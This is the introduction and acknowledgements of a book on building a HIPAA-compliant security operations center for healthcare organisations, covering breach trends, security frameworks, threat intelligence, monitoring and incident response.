Eric C. Thompson - Designing a HIPAA-Compliant Security Operations Center A Guide to Detecting and Responding to Healthcare Breaches and Events

Any source code or other supplementary material referenced by the author in this book is available to readers on GitHub via the books product page, located at www.apress.com/9781484256077 . For more detailed information, please visit http://www.apress.com/source-code .

Since the advent of the Wall of Shame hosted by the Department of Health and Human Services Office for Civil Rights, healthcare has been under constant attack. The first few years stolen medical records highlighted the attacks. Then right around 2015, ransomware attacks began. Millions of medical records are affected annually by ransomware, theft, and unauthorized disclosure due to misconfigurations.

Several tools and frameworks are available for healthcare entities to use when building and evaluating information security programs. The Cybersecurity Framework developed by the National Institute of Standards and Technology (NIST) and the Health Information Trust Alliance (HITRUST) framework are two examples. Each covers information security from top to bottom, from policy and procedure development, asset management to monitoring the environment. These are great places to start. Many prerequisite capabilities are addressed, each necessary for any program to achieve high levels of maturity. But more is needed to address the ongoing attacks. A deeper focus, a mindset if you will, on security operations is needed. That is what this book is about, adopting a mindset focused on security operations. After a short discussion on why security operations is important, and the compliance requirements within HIPAA, the book addresses each component of security operations: the need for vulnerability management to go beyond scanning and patching, why threat intelligence is important, how intelligence gathering leads to better alerting and monitoring processes, and how to respond to events effectively. This book talks about how to implement security, not check a box. If an entity does not monitor command-line execution and attackers targeting healthcare use PowerShell at the command line to download tools and escalate privileges, entities need to monitor for uses of PowerShell and other command-line executions. And when such events occur, the entity needs to respond swiftly.

Large budgets are not necessary to implement the processes necessary for security operations. Open source solutions are available, and it is possible for team members to learn how to customize each based on the environments where they are deployed. Security operations does not require large teams either. Having less than five members in the information security team is not unheard of, especially for small- to medium-sized providers, payers, and business associates. Again, it is about adopting the mindset of wanting to understand how sophisticated attackers and malicious insiders are targeting entities and implementing information security that quickly detects this activity. This book was a lot of fun to write, and I hope you enjoy it and learn something you can take to work.

Thanks to Susan McDermott. Over ten years ago, I went back to graduate school to make a career change, hoping to one day publish books in my field. Thanks to Susan, I have published three and the experience was amazing. Thanks to Rita Fernando for shepherding me through the process once again. Writing a book is challenging and its not unusual for self-doubt to appear during the process. Ritas positive attitude and direction play a significant role each time I complete one of these projects. I would also like to thank my technical editors Alfonso Gallegos and Julie Yang. These two are wonderful to work with and I am grateful for the experience.

Finally, I need to thank my family: my wife Daina, our daughter Hannah, and our two sons Daniel and Hunter. I beam with pride just thinking about you all.